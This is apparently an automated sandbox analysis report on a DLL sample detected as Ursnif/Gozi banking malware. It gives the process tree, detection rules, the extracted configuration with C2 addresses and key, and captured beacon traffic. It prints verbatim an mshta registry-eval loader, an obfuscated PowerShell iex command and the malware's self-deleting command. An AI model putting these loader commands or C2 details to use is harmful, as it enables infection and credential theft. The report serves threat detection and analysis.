
Windows Analysis Report
nhLAwAo49f

Overview

General Information

Sample Name: nhLAwAo49f (renamed file extension from none to dll)
Analysis ID: 614013
MD5: 117d2886bf0e722b91c0613f337e97da
SHA1: ca858266bb3a6c30bd798bd52ec9ad5f5992c999
SHA256: 5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37
Tags: 32, dll, exe, Gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6740 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6748 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6768 cmdline: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5304 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 3616 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 4028 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6232 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • rundll32.exe (PID: 6472 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 5520 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Yara matches in memory dumps (Source, Rule, Description, Author):
Source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
Source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Author: Joe Security
(21 further entries)

Yara matches in unpacked PE files (Source, Rule, Description, Author):
Source: 2.2.rundll32.exe.4890000.0.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 2.3.rundll32.exe.514a4a0.0.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 2.3.rundll32.exe.4c194a0.10.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
Source: 2.3.rundll32.exe.51f6940.2.raw.unpack, Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Author: Joe Security
(2 further entries)

                      System Summary

Source: File created, Author: Florian Roth, Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 5520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Threat created, Author: Nikita Nazarov, oscd.community, Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6092, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth, Data: Command: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6748, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, ProcessId: 6768, ProcessName: rundll32.exe
Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community, Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6092, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
Source: Process started, Author: juju4, Jonhnathan Ribeiro, oscd.community, Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5304, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6472, ProcessName: rundll32.exe
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6092, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, ProcessId: 4572, ProcessName: csc.exe
Source: Process started, Author: frack113, Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 684, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", ProcessId: 6232, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6092, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 588, ProcessName: conhost.exe
Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6092, TargetFilename: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132951499937436164.6092.DefaultAppDomain.powershell
Timestamp: 04/22/22-18:13:04.407179, SID: 2033203, Source Port: 49773, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/22/22-18:12:43.292918, SID: 2033203, Source Port: 49758, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/22/22-18:13:05.383399, SID: 2033204, Source Port: 49773, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 04/22/22-18:13:03.616504, SID: 2033203, Source Port: 49773, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

                      AV Detection

Source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source: nhLAwAo49f.dll ReversingLabs: Detection: 28%
Source: nhLAwAo49f.dll Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_04893072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04893072
Source: nhLAwAo49f.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.458226282.0000000000480000.00000002.00000001.01000000.00000003.sdmp, nhLAwAo49f.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdbine89 source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_00B5591B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B55A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_00B55A14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_00B5FCC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00B5CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_00B5CE21

                      Networking

Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49758 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49773 -> 146.70.35.138:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49773 -> 146.70.35.138:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 146.70.35.138 80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZikS/u68wld8v7/JzQJUDKg4_2FHKvnf_2F/gYZGX_2BFqw2fP1CIUg/LkSLAUfxVpj9UOLBiN4SzM/3p_2FST_2BWxB/bEkLoFXP/JI38DjkOM8fg69zOOdXCrW3/ft8HZYP438/0Zqpj_2F45Rs54Oh9/T9vyzwf7yRUW/99MF_2BHC7D/O7af6TuFb/aLreGz.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
